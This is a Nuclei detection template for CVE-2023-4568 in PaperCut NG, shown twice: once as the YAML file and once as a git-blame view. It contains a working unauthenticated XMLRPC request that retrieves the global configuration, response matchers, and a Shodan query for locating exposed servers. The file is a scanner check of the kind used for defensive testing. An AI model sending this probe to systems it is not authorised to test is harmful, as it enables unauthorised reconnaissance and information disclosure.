nuclei-templates/http/cves/2023/CVE-2023-4568.yaml

id: CVE-2023-4568

info:
  name: PaperCut NG Unauthenticated XMLRPC Functionality
  author: DhiyaneshDK
  severity: medium
  description: |
    PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
    - https://www.tenable.com/security/research/tra-2023-31
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-4568
    cwe-id: CWE-287
    epss-score: 0.00261
    epss-percentile: 0.63629
    cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: papercut
    product: papercut_ng
    shodan-query: html:"content="PaperCut""
  tags: cve,cve2023,unauth,papercut

http:
  - raw:
      - |
        POST /rpc/clients/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type:text/xml

        <?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'conf.ssl-port'
          - 'conf.auth-ttl-default'
        condition: and

      - type: word
        part: header
        words:
          - text/xml

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c26382a4aafe5ca4e8aa0fd49785a365960d8fb997158698b218295390148cb4022100c346a038c6abfa8004408dfd3f1339ef28df0ca1a31cb6f7824bd8e7aaacc14f:922c64590222798bb761d5b6d8e72950
Create CVE-2023-4568.yaml 2023-09-18 17:36:47 +00:00			`id: CVE-2023-4568`

			`info:`
			`name: PaperCut NG Unauthenticated XMLRPC Functionality`
			`author: DhiyaneshDK`
			`severity: medium`
			`description: \|`
			`PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-4568`
			`- https://www.tenable.com/security/research/tra-2023-31`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N`
			`cvss-score: 6.5`
			`cve-id: CVE-2023-4568`
			`cwe-id: CWE-287`
templateman update 2023-10-14 11:27:55 +00:00			`epss-score: 0.00261`
TemplateMan Update [Tue Oct 31 18:27:55 UTC 2023] :robot: 2023-10-31 18:27:55 +00:00			`epss-percentile: 0.63629`
Create CVE-2023-4568.yaml 2023-09-18 17:36:47 +00:00			`cpe: cpe:2.3:a:papercut:papercut_ng::::::::`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`vendor: papercut`
			`product: papercut_ng`
			`shodan-query: html:"content="PaperCut""`
			`tags: cve,cve2023,unauth,papercut`

			`http:`
			`- raw:`
			`- \|`
			`POST /rpc/clients/xmlrpc HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type:text/xml`

			`<?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- 'conf.ssl-port'`
			`- 'conf.auth-ttl-default'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- text/xml`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Wed Nov 1 14:09:41 UTC 2023] :robot: 2023-11-01 14:09:41 +00:00			`# digest: 4b0a00483046022100c26382a4aafe5ca4e8aa0fd49785a365960d8fb997158698b218295390148cb4022100c346a038c6abfa8004408dfd3f1339ef28df0ca1a31cb6f7824bd8e7aaacc14f:922c64590222798bb761d5b6d8e72950`